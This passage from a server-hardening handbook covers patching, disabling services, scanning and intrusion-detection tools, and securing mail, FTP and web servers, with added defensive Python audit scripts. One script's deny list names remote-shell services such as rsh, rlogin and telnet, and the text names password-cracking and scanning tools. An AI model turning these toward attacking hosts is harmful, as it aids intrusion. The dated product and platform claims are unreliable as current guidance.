One of the biggest threats to the security of your system is the presence of software faults or bugs. These can cause your system to crash, corrupt your information, or, worst of all, allow outsiders unauthorized access. It is stunning to see how many organizations are willing to operate mission-critical systems on "beta" or "pre-beta" software releases.

As a large number of web sites are based on Windows NT running on Intel-compatible microprocessors, there is an incredibly high incentive for attackers to find vulnerabilities in this configuration.228 For this reason, some organizations have decided to deploy uncommon configurations--such as OpenBSD running on Sun SPARC hardware in place of Solaris--simply because fewer attackers have experience with these systems. For example, if security is your primary concern in running a web server, consider running your web server on a Macintosh computer running the OS 7, OS 8, or OS 9 operating systems. Because these versions of the Macintosh operating system were not delivered with a command-line interpreter, it is extremely difficult for attackers to break into the system and run programs of their own choosing. They also don't come with dozens of network services enabled that can be compromised. And Apple has a very good history of providing carefully written, apparently bug-free code. Bear in mind, though, that an unusual platform only raises the attacker's cost; it is not a substitute for patching and careful configuration, and the classic Mac OS has no separation of user privileges, so any compromise of the server application is a compromise of the whole machine.

While the underlying operating system is important, equally important are the applications and the customized software that are layered on top of this base. A secure underlying system can be made vulnerable by a single vulnerable script that was written by a consultant to provide additional functionality.
Some steps that you should follow before specifying and deploying a new system include:

· Determine which vendors have the best reputation for producing bug-free, well-documented software. Find out what specific measures your vendors use to assure high security--such as the security criteria that they employ, data flow analysis, code audits, and/or penetration testing. Ask the vendors for copies of their metrics and test evaluations from reviews. You might also check the historical trends associated with the discovery and reporting of security flaws in software by that vendor. One source may be found at http://www.securityfocus.com/vdb/stats.html. (Because of the evolution in generally accepted methods of flaw discovery and reporting, we suggest that you don't use figures before 1997 or so in your evaluation, as they may not be reliable.)
· Investigate how your proposed vendors respond to reports of security or performance-relevant faults in their products. Is your proposed vendor timely and open in dealing with problems? Some vendors have a history of ignoring users unless there is significant bad press from complaints or incidents. These vendors should be avoided.
· Explore the importance your vendor attaches to good design, including security, safety, and user interfaces. Systems resistant to attacks and user mistakes are much better to use in situations where you need dependable operation.
· Determine whether your organization would be better off using "old-generation" software for which the problems are presumably well-known, or "leading-edge" software that offers new features.
· Choose the system with the fewest features that does what you want well. Hardware is relatively inexpensive: buying a dedicated system in a reduced configuration for a web server (for example) may be a better purchase than a clone of one of your standard systems that results in a massive break-in.
Here are some things to request or require when shopping for software and systems:

· Proof that good software engineering practices were followed in the design, coding, and testing of the software.
· Documentation showing the results of testing the software and system in environments similar to yours. Ideally, testing should include both operational testing and stress testing.
· A written statement of the vendor's policy for accepting, documenting, and responding to reports of faults in the product.
· A written statement of how the vendor notifies customers of newly fixed security flaws. (The most responsible vendors release notices through FIRST teams and through customer mailing lists; the least responsible vendors never announce fixes, or bury them in lists of other bug fixes in obscure locations.)
· Examples of previous notifications and bug fixes.

Although the computer industry is beginning to take computer security seriously, no software vendor will warrant its products against losses related to insecure code--not even the vendors of security products. A few insurance companies are now issuing policies to cover losses from break-ins and defacements of web sites. You should investigate these policies to see if there are different rates for different systems. As time goes on, rates should adjust to reflect the configurations that present less risk (and thus warrant smaller premiums).229

228 There are other reasons why Microsoft products seem to be a favorite of attackers. These include the large numbers of vulnerabilities that keep being discovered, the complexity of the software which makes the software difficult for administrators to secure, and the simple fact that Microsoft is disliked by many people.

Obtaining and Maintaining Software

Once you have decided upon a vendor, hardware platform, and software, you need to install everything.
Installation is an extremely important process. Frequently, mistakes made during installation can come back to haunt you after you have brought your system online and gone on to other projects. So take your time and be certain of what you are doing.

Conducting an inventory

Inventory all of your systems. Write down the serial numbers, the amount of RAM, the kinds of processors, option cards, and other hardware configuration options. Make sure that you have copies of this information in at least two locations--one easy way to do so is to type the information into a spreadsheet and e-mail a copy to yourself at home (the inventory is a map of your infrastructure and is useful to an attacker, so protect the off-site copy as you would any other sensitive document). This information will be useful for diagnosing performance issues. If you suffer a theft or loss, it will be useful for insurance purposes, too. You should also inventory your software. For each product, note the vendor, the distribution, and the release. If you have software that comes with activation codes, it may be useful to record these as well. However, if you record the activation codes, you should attempt to secure them, because the distribution of activation codes could be considered software piracy by some vendors. Be sure that you save all of the original packing material, documentation, blow-in inserts, and other information that comes with your computers and software. This can be critical if you are returning the equipment or need to relocate it. It is also surprising how many companies put vital information on seemingly innocuous printouts. Frequently, last minute inserts can be security or safety warnings, so be sure to at least glance at every piece of paper that you receive with your hardware and software.

Installing software and patches

Before you start to install the software for your computer, check the web site of each vendor to make sure you have all of the security patches and bug fixes for the version of the software that you intend to install.
It is a good idea to read the release notes for both the base operating system and the patches. Some vendors distribute patches that must be installed in a particular order--installing the patches out of order can sometimes result in security vulnerabilities being reintroduced!

If at all possible, you should disconnect your computer from the Internet at the start of the installation procedure and not connect it until you are finished. There are many recorded cases of computers connected to the Internet being compromised between the time that the computer's base operating system was installed and the time that the patches were going to be installed. Unfortunately, it is increasingly difficult to install updates and register software without the computer being connected to the Internet. If you cannot stay offline, download the patches on an already-secured machine and carry them over, or place the new computer behind a firewall that permits only outbound connections to the vendor's update servers until it is fully patched.

Once you have made sure that your computer is not connected to the Internet, install the computer's base operating system, any operating system patches, then the application programs and the application patches. Keep a notebook and record every specific action that you take. Such a log can be immensely useful if you are going to be installing several computers and hope to delegate the activity to others. At this point, before any further work is done, you should make a complete backup of the computer system. This backup will be invaluable if your computer is compromised by an attacker or a hardware failure. After your first backup is finished, you can make any local customizations that are required. You should then make a second backup of your computer system onto a different tape, CD, or disk. Finally, make sure that all of the distribution software and the backups are stored in a place that is safe and will not be forgotten. Make sure that physical access to the computer is restricted.

229 As of late 2001, at least one insurance company charges higher premiums to customers using Windows and/or IIS as platforms.
You may also wish to remove the floppy and CD-ROM drives to make it more difficult for a person who has physical access for a brief period of time to compromise your server.

Minimizing Risk by Minimizing Services

An important way to minimize the threats to your server is by minimizing the other services that are offered by the computer on which the server is running. If you don't need a service, disable it. By eliminating all non-essential services, you eliminate potential avenues through which an attacker could break into your system. One implication of this principle is that, when possible, you should separate services onto different computers: DNS servers, mail servers, web servers, file servers, etc. Some services, such as finger, netstat, systat, and rwho, should be routinely disabled because they provide sensitive information to outsiders. Others, like chargen and echo, can be used for denial of service attacks. Network services that transmit reusable unencrypted passwords, like telnet and (non-anonymous) FTP, or that authenticate users by IP address, like rlogin and rsh, should be disabled in favor of secure alternatives, like ssh or one-time password systems. On a Unix server, you can easily disable unneeded services by commenting out the appropriate lines in inetd.conf and then sending inetd a HUP signal (or restarting it) so that it rereads the file. Another small handful of services that run as standalone daemons (portmapper is an example) can be eliminated in the "rc" files, found in the files /etc/rc and /etc/rc.local, and the subdirectories below /etc/rc.d, /etc/init.d, and /usr/local/etc/rc.d. After making these changes, confirm the result with netstat -a (or a port scan from another host): anything still listening that you did not intend to offer is a service you have not yet found. You can also use TCP wrappers and host-based firewalls to control access to services, as described in chapter 5-6. Disabling IP services with an NT or Windows 2000 system is a little trickier, because settings are sprinkled throughout the registry, and some services have to be functioning for the sake of NT itself. Many NT services can be audited and disabled using the Services control panel.
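For the Unix side of the advice above, the following script is an added example (not the handbook's own and not part of any vendor tool): it parses an inetd.conf, reports every active line that offers one of the services the text says to disable, and writes out a copy with those lines commented out. The service names follow /etc/services conventions (rsh appears as "shell", rlogin as "login"), the reasons are the ones given above, and the sample file is constructed for the example.

```python
"""inetd.conf audit (added example; not from the handbook or any vendor tool).

Parses an inetd.conf, reports every active service the text above says to
disable, and produces a copy with those lines commented out. The sample
configuration below is constructed for the example, not taken from a host.
"""
from typing import Dict, List, Tuple

# service name -> reason it should not be offered to the network
RISKY: Dict[str, str] = {
    "finger": "reveals user information",
    "netstat": "reveals network configuration",
    "systat": "reveals running processes",
    "rwho": "reveals logged-in users",
    "echo": "denial-of-service amplification",
    "chargen": "denial-of-service amplification",
    "telnet": "plaintext reusable passwords",
    "ftp": "plaintext reusable passwords (non-anonymous)",
    "shell": "rsh: trusts client IP address",
    "login": "rlogin: trusts client IP address",
    "exec": "rexec: plaintext password, trusts client IP address",
}

SAMPLE_INETD_CONF = """\
# constructed sample inetd.conf, not taken from a real host
ftp      stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet   stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
finger   stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd
echo     stream  tcp  nowait  root    internal
chargen  stream  tcp  nowait  root    internal
shell    stream  tcp  nowait  root    /usr/sbin/tcpd  in.rshd
login    stream  tcp  nowait  root    /usr/sbin/tcpd  in.rlogind
systat   stream  tcp  nowait  guest   /usr/sbin/tcpd  /bin/ps -auwwx
ssh      stream  tcp  nowait  root    /usr/sbin/sshd  sshd -i
#pop3    stream  tcp  nowait  root    /usr/sbin/tcpd  ipop3d
"""


def audit_inetd(text: str) -> Tuple[List[Tuple[str, str]], str]:
    """Return (findings, hardened_text).

    findings: (service, reason) for each active line offering a risky service.
    hardened_text: the same file with those lines commented out and tagged.
    """
    findings: List[Tuple[str, str]] = []
    out: List[str] = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            out.append(line)                      # blank or already disabled
            continue
        fields = stripped.split()
        if len(fields) < 6:
            out.append(line)                      # malformed; leave for a human
            continue
        # The first field may be "addr:name" or "name/version" (RPC);
        # take the bare service name for the lookup.
        service = fields[0].lower().split(":")[-1].split("/")[0]
        if service in RISKY:
            findings.append((service, RISKY[service]))
            # A line beginning with '#' is a comment in its entirety, so the
            # trailing tag is safe.
            out.append(f"#{line}  # disabled by audit: {RISKY[service]}")
        else:
            out.append(line)
    return findings, "\n".join(out) + "\n"


def active_services(text: str) -> List[str]:
    """Names of services still enabled in an inetd.conf (for a final check)."""
    names: List[str] = []
    for line in text.splitlines():
        s = line.strip()
        if s and not s.startswith("#"):
            names.append(s.split()[0].lower())
    return names


if __name__ == "__main__":
    findings, hardened = audit_inetd(SAMPLE_INETD_CONF)
    for service, reason in findings:
        print(f"disable {service:8s} {reason}")
    print("still enabled:", active_services(hardened))
```

After replacing the real inetd.conf with the hardened copy, send inetd a HUP signal and confirm with netstat -a that the disabled ports are no longer listening; the script only edits the file, it does not restart anything.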
The good news on the NT side is that NT servers come with built-in access list capability. You can use this to prohibit all traffic to certain ports, and thereby achieve the same results as you would by shutting down services. (You can set IP filtering under the Control Panel's advanced TCP/IP settings.)

Another variation on minimizing services is minimizing privileges. Servers that don't have to run as the superuser or Administrator shouldn't; those that must should give up superuser privileges as soon as possible if they can. In many cases, each different kind of server process should run with its own uid and group. Servers that can be restricted to a small area of the filesystem (using the chroot() or jail() system calls) should be.

Keeping Abreast of New Vulnerabilities

In today's environment, you must stay abreast of newly discovered vulnerabilities if you wish to maintain a secure computer that is connected to the Internet. Vulnerabilities are usually publicized with breathtaking speed once they are discovered. What's more, once a vulnerability is known, exploits are quickly developed and distributed across the Internet. In many cases, system administrators only have a few hours between the time that a vulnerability is first publicized and the time when they will start to be attacked with it. Monitor the bulletins issued by your vendors and install security-related patches as soon as they are made available. Most vendors have mailing lists that are specifically for security-related information. Another source of information is FIRST230 teams such as the CERT/CC (Computer Emergency Response Team, Coordination Center) at the Software Engineering Institute. The CERT/CC collects reports of computer crime, provides the information to vendors, and distributes information from vendors regarding vulnerabilities of their systems.
Because CERT/CC and many other response teams do not always make information available in a timely fashion, however, don't depend on them as your primary information source. As a backup, you might also subscribe to one or two of the security-related mailing lists, such as nt-security, bugtraq, and firewalls.

Using Security Tools

A security tool is a special program that you can run to evaluate or enhance the security of your site. Many security tools that are available today were developed at universities or by independent specialists and are freely distributed over the Internet. There are also several good tools that are marketed commercially. There are five kinds of tools that you should consider using:

· Tools that scan your system for potential weaknesses that a local user could exploit
· Tools that monitor your system over time, looking for unauthorized changes (see Chapter 5, Auditing and Forensics, for a complete discussion)
· Tools that scan your network, looking for network-based weaknesses
· Tools that monitor your system and network to identify attacks in progress
· Tools that record all network activity for later analysis

Automated tools are (usually) a low-cost, highly effective way to monitor and improve your system's security. Some of these tools are also routinely employed by attackers to find weaknesses in sites around the Internet. Therefore, it behooves you to obtain your own tools and use them on a regular basis.

Snapshot tools

A snapshot or static audit tool will scan your system for weaknesses and report them to you. For example, on your Unix system a tool might look at the /etc/passwd file to ensure that it is not writeable by anyone other than the superuser. Snapshot tools perform many (perhaps hundreds) of checks in a short amount of time.

230 Forum of Incident Response and Security Teams, the worldwide consortium of major computer incident response groups. Visit http://www.first.org for more information.
An up-to-date Unix snapshot tool is Tiger, from Texas A&M University. Tiger runs on a wide variety of operating systems and is easy to install. Several packages are available in the Windows world. The Kane Security Analyst (KSA) from Intrusion Detection, Inc. (http://www.intrusion.com/) will check passwords and permissions (ACL), and monitor data integrity. NAT is a free tool for assessing NetBIOS and NT password security made available by Security Advisors (http://www.secnet.com). Two tools for checking NT passwords are ScanNT, written by Andy Baron (http://www.ntsecurity.com/Products/ScanNT/index.htm), and L0pht Crack, by the "computer security researchers" at L0pht Heavy Industries (now part of @Stake).

A snapshot program should be run on a regular basis--no less than once a month and probably at least once a week. Carefully evaluate the output of these programs, and follow up if possible. Don't leave the output from a snapshot security tool in a place that is accessible to others: by definition, the holes that they find can easily be exploited by attackers.

Network scanning programs

These tools check for well-known security-related bugs in network programs such as sendmail and ftpd. Your computers are certainly being scanned by crackers interested in breaking into your systems, so you might as well run these programs yourselves. Among the most powerful freely available tools for Unix operating systems is Nessus (http://www.nessus.org). SomarSoft (http://www.somarsoft.com) offers several tools for analyzing information culled from Windows NT logs and databases. KSA, mentioned above, also provides analysis and integrity checking for NT environments. Another powerful scanning program is nmap (http://www.insecure.org/nmap), which scans for open network ports, can map networks, and can often identify the operating system of a computer by its responses to network scans.
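The most basic check a snapshot tool makes is the one described above for /etc/passwd: the file must be owned by root and writable by nobody else. The following is an added example of that check (not Tiger's code or any other tool's): check_entry() is a pure function over stat() results, so it can be exercised with constructed modes, and audit() applies it to the live filesystem. The list of files and the expected modes are assumptions for the example, not a standard.

```python
"""File-ownership and permission snapshot check (added example, not Tiger's code)."""
import os
import stat
from typing import Dict, List, Tuple

# path -> (most permissive mode allowed, required owner uid). Assumed values;
# adjust to your platform's conventions.
EXPECTED: Dict[str, Tuple[int, int]] = {
    "/etc/passwd":     (0o644, 0),
    "/etc/shadow":     (0o640, 0),
    "/etc/inetd.conf": (0o644, 0),
    "/etc/rc.local":   (0o755, 0),
}


def check_entry(path: str, st_mode: int, st_uid: int,
                max_perm: int, owner: int) -> List[str]:
    """Findings for one file given its st_mode/st_uid (empty list = clean)."""
    findings: List[str] = []
    perm = stat.S_IMODE(st_mode)
    if st_uid != owner:
        findings.append(f"{path}: owned by uid {st_uid}, expected {owner}")
    if perm & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    extra = perm & ~max_perm                       # any bit beyond the allowed mode
    if extra:
        findings.append(f"{path}: mode {perm:04o} exceeds {max_perm:04o} (extra bits {extra:04o})")
    if perm & (stat.S_ISUID | stat.S_ISGID):
        findings.append(f"{path}: setuid/setgid bit set on a configuration file")
    return findings


def audit(expected: Dict[str, Tuple[int, int]] = EXPECTED,
          statfn=os.lstat) -> List[str]:
    """Run check_entry over real files.

    lstat() is used on purpose: a symbolic link standing in for a system
    file is itself a finding, not something to follow silently.
    """
    findings: List[str] = []
    for path, (max_perm, owner) in expected.items():
        try:
            st = statfn(path)
        except FileNotFoundError:
            findings.append(f"{path}: missing")
            continue
        if stat.S_ISLNK(st.st_mode):
            findings.append(f"{path}: is a symbolic link")
            continue
        findings.extend(check_entry(path, st.st_mode, st.st_uid, max_perm, owner))
    return findings


if __name__ == "__main__":
    for finding in audit() or ["no findings"]:
        print(finding)
```

Run it from cron and diff successive reports; as the text says, keep the output where only the administrator can read it.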
Intrusion detection systems

Intrusion detection system (IDS) programs are the operating system equivalent of burglar alarms. As their name implies, these tools scan a computer as it runs, watching for the tell-tale signs of a break-in. Intrusion detection systems can either be host-based or network-based. A host-based system looks for intrusions on that particular host. Most of these programs rely on secure auditing systems built into the operating system. Network-based systems monitor a network for the tell-tale signs of a break-in on another computer. Most of these systems are essentially sophisticated network monitoring systems that use Ethernet interfaces as packet sniffers. An example of a sophisticated free network IDS is Snort (http://www.snort.org).

Virus scanners

There is a huge market for antivirus tools in the Windows environment. When choosing antivirus software, consider not only the product's features, but what kind of support it provides for updating the list of viruses that it can recognize. Many commercial virus scanners use a subscription model, in which you can download weekly updates to the virus engine as long as you maintain a subscription. Antivirus tools are rarely needed on Unix or Linux systems themselves--as of this writing only three or four viruses have been reported for these platforms, and they do not spread well. (Worms and rootkits that target Unix do exist, but they arrive through exploited services rather than infected files, and what they leave behind is exactly what an integrity monitor detects.) An integrity monitor (such as Tripwire) will therefore perform any antivirus function needed on these platforms as a side-effect of the way it works. Similarly, older Mac OS systems primarily need antivirus tools to combat macro viruses in Microsoft Office products. On the other hand, a Unix-based mail server can serve as an antivirus gateway to protect Windows mail clients. Several antivirus engines detect Windows viruses but run on Unix machines for just this purpose.
Network recording and logging tools

Network recording and logging tools record all of the traffic that passes over a network, preserving it for retrospective analysis. These systems are typically run on computers with large disks. (An 80-gigabyte hard disk, for example, can store nearly two weeks of typical traffic sent over a T1 line.) In the event of a break-in or other incident, the recorded traffic can be analyzed. Note that such an archive contains every plaintext password and message that crossed the wire, so the recording host must be protected at least as carefully as the servers it watches, and its retention period should be a deliberate policy decision.

Securing Mail Servers

Mail servers are often the most important servers in any organization. When mail servers are down, a major communication link between the organization's clients, vendors, and employees is severed. When mail servers are compromised, private and confidential information is quickly exposed. Although the usual host security measures apply to mail servers, several special considerations arise.

Choosing a Mail Transport Agent

The mail transport agent (MTA) is the software that is responsible for receiving and relaying e-mail. At one end, it communicates with mail user agents that connect to the transport agent to send e-mail. At the other, it communicates with mail delivery agents that perform the final delivery of e-mail to its destination. An MTA must be properly configured so that it will accept mail to and from the proper users and no others. For Unix-based mail servers, the leading MTAs include sendmail, postfix, qmail, and exim. Sendmail is the oldest, best known, and most widely used MTA; it also has the worst security record, in large part because it was designed at a time when the Internet was young and performance was more important than security. Postfix, qmail, and exim, on the other hand, were designed from the start with security in mind.
If you make one security-related decision for your mail servers, it should be to run something other than sendmail; if you must run sendmail, read its extensive documentation carefully, as well as the O'Reilly and Associates Sendmail book, and be paranoid about configuration. Both postfix and exim can replace an existing sendmail-based system fairly painlessly. Windows-based mail servers may use such MTAs as Imail or Microsoft Exchange Server. Historically, Windows MTAs have not done a good job of complying with Internet standards, and have only a mediocre security record.

Spam

Unsolicited commercial e-mail (commonly referred to as "spam") has become a pervasive and costly problem. When providing e-mail services, it is imperative to ensure that neither outsiders nor authorized users can use your systems to send spam. Controlling access by outsiders is relatively easy if you use current versions of your MTA software. All major MTAs now come with default configurations that will cause them to refuse to relay e-mail unless it's destined for a local user or sent by a trusted machine. A "trusted machine" usually means a machine with a given IP address (which is only trustworthy when the machine is inside the perimeter of a firewall that prevents IP spoofing), but can also mean a machine that can authenticate itself to the server cryptographically. Cryptographic authentication is often used by mail clients on laptops or other machines that receive their IP addresses dynamically. One widely-used approach is the SMTP AUTH protocol, an extension of SMTP that provides for authentication using one of the mechanisms in the Simple Authentication and Security Layer (SASL) described in RFC 2222.
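The relay rule just described, worked through as an added example (not the handbook's code and not taken from any MTA): a RCPT TO is accepted only if the recipient is in a domain this host delivers for, or the client is on a trusted network by IP address, or the client has authenticated with SMTP AUTH. The example also refuses AUTH PLAIN until STARTTLS has been negotiated, because PLAIN carries the password in the clear. The domains, the trusted network, and the user table are constructed for the example.

```python
"""SMTP relay policy and AUTH PLAIN handling (added example; not from the
handbook or any MTA)."""
import base64
import hmac
import ipaddress
from typing import Iterable, List, Tuple

LOCAL_DOMAINS = {"example.org", "mail.example.org"}      # assumed
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]      # assumed internal LAN, behind anti-spoofing
USERS = {"alice": "correct horse battery"}                 # constructed; store hashes in real life


def relay_decision(client_ip: str, authenticated: bool, rcpt: str,
                   local_domains: Iterable[str] = LOCAL_DOMAINS,
                   trusted_nets: Iterable = TRUSTED_NETS) -> Tuple[str, str]:
    """Return (SMTP reply code, reason) for a RCPT TO address."""
    if rcpt.count("@") != 1:
        return "501", "malformed recipient"
    domain = rcpt.rsplit("@", 1)[1].lower().rstrip(".")
    if domain in {d.lower() for d in local_domains}:
        return "250", "local delivery"
    if authenticated:
        return "250", "relay for authenticated client"
    ip = ipaddress.ip_address(client_ip)
    if any(ip in net for net in trusted_nets):
        return "250", "relay for trusted network"
    return "554", "relay access denied"


def make_plain_blob(user: str, password: str, authzid: str = "") -> str:
    """Encode SASL PLAIN credentials the way a client sends them."""
    return base64.b64encode(f"{authzid}\0{user}\0{password}".encode()).decode()


def check_auth_plain(blob: str) -> bool:
    """Verify a SASL PLAIN blob ("authzid\\0authcid\\0password", base64)."""
    try:
        parts = base64.b64decode(blob, validate=True).decode().split("\0")
    except (ValueError, UnicodeDecodeError):
        return False
    if len(parts) != 3:
        return False
    _, user, password = parts
    expected = USERS.get(user, "")
    return bool(expected) and hmac.compare_digest(expected, password)


def smtp_session(client_ip: str, commands: Iterable[str]) -> List[str]:
    """Run a sequence of SMTP commands through the policy; one reply each."""
    tls = False
    authed = False
    replies: List[str] = []
    for cmd in commands:
        verb, _, arg = cmd.partition(" ")
        verb = verb.upper()
        if verb == "EHLO":
            exts = ["STARTTLS"] + (["AUTH PLAIN"] if tls else [])
            replies.append("250 " + " ".join(exts))   # AUTH only advertised once encrypted
        elif verb == "STARTTLS":
            tls = True                                  # the TLS handshake would follow here
            replies.append("220 Ready to start TLS")
        elif verb == "AUTH":
            mech, _, blob = arg.partition(" ")
            if not tls:
                replies.append("538 Encryption required for requested authentication mechanism")
            elif mech.upper() == "PLAIN" and check_auth_plain(blob):
                authed = True
                replies.append("235 Authentication successful")
            else:
                replies.append("535 Authentication credentials invalid")
        elif verb == "MAIL":
            replies.append("250 OK")
        elif verb == "RCPT":
            addr = arg.split(":", 1)[-1].strip().strip("<>")
            code, reason = relay_decision(client_ip, authed, addr)
            replies.append(f"{code} {reason}")
        else:
            replies.append("500 Command not recognized")
    return replies
```

The trusted-network branch is only as good as the perimeter: a spoofed source address from outside would pass it, which is why the text ties IP-based trust to an anti-spoofing firewall.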
A second form of cryptographic authentication is to issue TLS client certificates to clients and use the STARTTLS extension to authenticate them.231 Insiders who send spam can inundate your organization's network bandwidth and can quickly damage your reputation or even leave you open to legal action.232 A key control on spam by insiders is to ensure that they can only send outgoing mail through mail servers that you control and monitor. An effective way to do this is to block outgoing connections to TCP port 25 (the SMTP service's port) at your firewall, and then only allow your mail servers to make such connections.

Confidentiality and Integrity

Most MTAs can be configured to allow (or require) TLS-encrypted connections. The SMTP protocol has been extended to include a STARTTLS operation that initiates a TLS handshake in the SMTP dialogue. Using TLS is highly recommended, as it protects both the confidentiality and integrity of the messages "on the wire", as well as offering additional assurance that the client is connecting to the authentic SMTP server it expects. Two caveats apply: that assurance only holds if the client actually verifies the server's certificate, and because STARTTLS is negotiated in the clear, an active attacker between two servers that merely "allow" TLS can strip the offer and force a plaintext session, so "require" TLS wherever both peers are under your control. Similarly, if you provide POP or IMAP mailbox service to your users, most current POP/IMAP clients can make SSL/TLS encrypted connections to your POP/IMAP server, if you configure it to accept (or require) them. Because these protocols, by default, transmit passwords without encryption, requiring SSL/TLS connections provides significant protection for the user as well as their messages.233 Another alternative to unencrypted POP/IMAP service is to provide users with access to their e-mail through their web browser by using a "webmail" system. A major advantage of webmail is that the web server can be secured by SSL/TLS, and all web browsers are capable of taking advantage of the secure connection.

Securing Anonymous FTP Servers

The FTP protocol presents several problems to system administrators--so many, in fact, that the best practice today is not to run an FTP server at all.
Instead, allow outsiders to download files through a web server, and require insiders to transfer files using scp or sftp (part of the ssh suite) or WebDAV over SSL/TLS. If you must run an anonymous FTP server to permit outsiders to download or upload files, follow these guidelines:

· Carefully read your FTP server's documentation for how to properly set up the anonymous file area so that anonymous users can only download from directories you specify and cannot delete files, rename files, or modify directory structures.
· Avoid providing convenience executables like compression or archive programs that might have exploitable vulnerabilities. On Unix systems, if your FTP server provides its own directory display functionality, don't even provide an ls executable.
· If your FTP server uses a password file to associate the uids of file owners with their login names, don't use your server's actual password file. Instead, make a dummy file that lists only the information you must (or don't use a file at all and let clients see uids).
· If you allow file uploads, allow them in separate directories from the download directories, and be sure that users cannot download the uploaded files. This prevents your FTP site from being used to traffic in illegal software or other files. You should also ensure that uploaded files cannot have special characters in their filenames and that the upload area is on a separate disk partition to prevent a denial of service attack through overflowing the disk.

231 Another popular, if less inherently secure, approach is POP-before-SMTP. In this approach, clients must first check their e-mail via POP, which records their IP address. The SMTP server then allows relaying from the recorded IP addresses for a limited time. This approach can be convenient, but is less secure unless the POP connection is itself encrypted.
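The last guideline above, implemented as an added example (not the handbook's code and not part of any FTP server): an uploaded filename may contain only a conservative ASCII set, with no path separators, no leading dot, no control or non-ASCII characters, and nothing that resolves outside the drop box; uploads land in an incoming directory separate from the public tree, are never overwritten, and are capped in size. The directory names and the size cap are assumptions for the example. In practice the incoming directory also sits on its own partition and is made writable but not readable for the anonymous user (mode 1733), so nothing uploaded can be fetched back.

```python
"""Upload-name and upload-path checks for an anonymous FTP drop box (added
example; not the handbook's or any FTP server's code)."""
import os
import re
from typing import Optional

INCOMING_DIR = "/var/ftp/incoming"    # assumed: separate partition, write-only drop box
PUBLIC_DIR = "/var/ftp/pub"           # assumed: read-only download tree

# First character alphanumeric (so no dotfiles, no "." or ".."), then a short
# ASCII set; separators, spaces, control and non-ASCII characters never match.
_SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def safe_upload_name(name: str) -> bool:
    """True if `name` is a single safe path component."""
    return _SAFE_NAME.fullmatch(name) is not None


def upload_path(name: str) -> Optional[str]:
    """Absolute path to store an upload under, or None if the name is rejected.

    The lexical containment check is belt-and-braces: safe_upload_name()
    already forbids separators, but a later change to the pattern must not
    silently allow escaping the drop box.
    """
    if not safe_upload_name(name):
        return None
    full = os.path.normpath(os.path.join(INCOMING_DIR, name))
    if os.path.commonpath([INCOMING_DIR, full]) != INCOMING_DIR:
        return None
    if full.startswith(PUBLIC_DIR + os.sep):
        return None                       # uploads never land in the download tree
    return full


def store_upload(name: str, data: bytes, max_bytes: int = 16 * 1024 * 1024) -> Optional[str]:
    """Write an upload, refusing to overwrite and capping its size.

    O_EXCL stops one uploader from replacing another's file; the per-file
    cap complements the separate partition against disk-filling attacks.
    """
    path = upload_path(name)
    if path is None or len(data) > max_bytes:
        return None
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path
```

A server that renames every accepted upload to a name of its own choosing (a counter or a hash) removes the remaining dependence on the uploader's name entirely; the checks above are the minimum for a server that keeps the original name.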
232 In fact, the huge amount of spam that originates from countries with ineffective legal remedies has significantly damaged the reputation of entire nations to the degree that many mail administrators routinely refuse any e-mail originating from these countries.

233 Both POP and IMAP do support authentication mechanisms that don't transmit unencrypted passwords on the network, but most of these are more tedious to enable than SSL/TLS, and don't provide the privacy or integrity protection of message encryption.

Don't provide non-anonymous FTP service at all unless you can protect it with a VPN tunnel or a cryptographic wrapper like SafeTP (http://safetp.cs.berkeley.edu).

Securing Web Servers

When it comes to serving web pages, the general rules of server security apply. Choose an operating system and a web server application with a good security philosophy and a good security record. Carefully read the web server's documentation, particularly around security issues. Disable any guest logins and limit the number of users with accounts on the web server to those who require them. Disable administrative logins from the network. On a Windows system, if you must administer the server remotely, change the name of the "Administrator" account to something more difficult to guess (this only slows down guessing: the account keeps its well-known relative identifier of 500, so tools that enumerate accounts by SID will still find it, and a strong password remains essential). On a Unix system, disable root logins and require users to use the su program for administration. There are, however, several security issues specific to running web servers. Most notable are data confidentiality, server-side scripting and content updating.

Data Confidentiality

If you will be transmitting sensitive information, get an SSL certificate and use an SSL-enabled web server (both Apache and IIS can be configured to use SSL).
If you're designing an intranet application (or an Internet application that's restricted to your clients or employees), you can use a self-signed SSL certificate or set up your own certificate authority. Otherwise, you'll probably need to invest in SSL certificates from a well known certificate authority like VeriSign, whose signing certificate is bundled with major web browsers. See chapter 5-4 for more information about SSL certificates.

If you don't use SSL, the entire HTTP transaction occurs unencrypted, including the usernames and passwords used in "basic" HTTP authentication and any form fields that the client transmits. In most cases, if you plan to authenticate the user you should implement SSL to protect the transaction.

Server-Side Scripting

Web servers are fine programs for displaying static information such as brochures, FAQs, and product catalogs. But applications that are customized for the user or that implement business logic (such as shopping carts) require that servers be extended with specialized code that executes each time the web page is fetched. This code most often takes the form of scripts or programs that are run when a particular URL is accessed.

There is no limit to what a good programming team can do with a web server, a programming language, and enough time. Unfortunately, programs that provide additional functionality over the Web can have flaws that allow attackers to compromise the system on which the web server is running. These flaws are rarely evident when the program is run as intended.

There are four primary techniques that web developers can use to create web-based applications:

CGI

The Common Gateway Interface (CGI) was the first means of extending web servers. When a URL referencing a CGI program is requested from the web server, the web server runs the CGI program in a separate process, captures the program's output, and sends the results to the requesting web browser.
Parameters to the CGI programs are encoded as environment variables and also provided to the program on standard input. CGI programs can perform database queries and display the results, allow people to perform complex financial calculations, and allow web users to "chat" with others on the Internet. Indeed, practically every innovative use of the World Wide Web, from web search engines to web pages that let you track the status of overnight packages, was originally written using the CGI interface.

Plug-ins, loadable modules, and Application Programmer Interfaces (APIs)

The second technique developed to extend web servers involved modifying the web server with extension modules, usually written in C or C++. The extension module was then loaded into the web server at runtime. Plug-ins, modules, and APIs are a faster way to interface custom programs to web servers because they do not require that a new process be started for each web interaction. Instead, the web server process itself runs application code within its own address space that is invoked through a documented interface. But these techniques have a distinct disadvantage: the plug-in code can be very difficult to write, and a single bug can cause the entire web server to crash.

Embedded scripting languages

